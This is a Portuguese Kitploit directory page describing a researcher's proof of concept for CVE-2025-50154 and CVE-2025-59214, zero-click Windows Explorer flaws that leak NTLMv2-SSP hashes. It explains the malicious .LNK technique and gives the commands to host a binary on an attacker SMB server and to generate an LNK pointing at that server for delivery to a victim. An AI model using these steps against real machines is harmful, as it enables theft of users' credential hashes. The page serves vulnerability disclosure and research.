Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-50154 — POCs para CVE-2025-50154 e CVE-2025-59214, vulnerabilidades zero-day no explorador de arquivos do Windows que expõem NTLMv2-SSP sem interação do usuário. É um bypass para o patch de segurança CVE-2025-24054. | Kitploit
Ferramentas/GitHubGitHub/rubenformation/cve-2025-50154
Análise de VulnerabilidadesExploraçãoMovimento LateralAprendizado e Educação
GitHubrubenformation/cve-2025-50154

CVE-2025-50154

POCs para CVE-2025-50154 e CVE-2025-59214, vulnerabilidades zero-day no explorador de arquivos do Windows que expõem NTLMv2-SSP sem interação do usuário. É um bypass para o patch de segurança CVE-2025-24054.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site
5515há 10 mesesRevisado pelo Kitploit

CVE-2025-50154, CVE-2025-59214

Divulgação de Hash NTLMv2-SSP Zero Clique no Explorador de Arquivos do Windows

Por Ruben Enkaoua e Cymulate

Primeiro Blog: Zero Clique, Um NTLM: Bypass do Patch de Segurança da Microsoft (CVE-2025-50154)

Segundo Blog: Patchado Duas Vezes, Ainda Contornado: Novo Vazamento de NTLM (Bypass do Patch CVE-2025-50154)

Descrição


Embora a Microsoft tenha lançado uma atualização de segurança para corrigir uma vulnerabilidade de divulgação de hash NTLM baseada em ícones, descobri um bypass que ainda permite a um atacante recuperar hashes NTLMv2-SSP sem interação do usuário.

A vulnerabilidade original, recentemente corrigida, era uma divulgação de hash NTLM de 0 clique acionada quando o explorer.exe renderizava o ícone de um atalho .LNK cujo ícone estava hospedado em um servidor SMB remoto.
Após o patch, o explorer.exe não carrega mais ícones de caminhos SMB remotos, impedindo a divulgação automática de hashes NTLM.

Atualização: O patch para o CVE-2025-50154 não funcionou de forma alguma. Nós o reportamos, e um novo CVE foi atribuído à vulnerabilidade: CVE-2025-59214. O POC é relevante para ambos os CVEs.

Ao criar um arquivo .LNK com:

  • Ícone padrão do shell32.dll
  • Caminho de destino apontando para um arquivo binário hospedado em um SMB remoto

O processo explorer.exe ainda buscará o arquivo remoto para extrair o ícone PE de seus recursos RT_GROUP_ICON e RT_ICON.

DA-NTLMv2-SSP-leak

Passos


Inicie um servidor do Responder no seu servidor

root@kitploit:~
# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support

Crie um LNK malicioso com PowerShell, em uma máquina diferente, e depois entregue-o à vítima (download malicioso, upload via SMB...)

root@kitploit:~
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"

O processo explorer.exe renderizará o ícone baixando o arquivo automaticamente, procurando por cabeçalhos RT_ICON e RT_GROUP_ICON na seção .rsrc

Notas


Este código é apenas para fins educacionais e de pesquisa.
O autor não se responsabiliza por qualquer uso indevido deste código.
Baixar ferramenta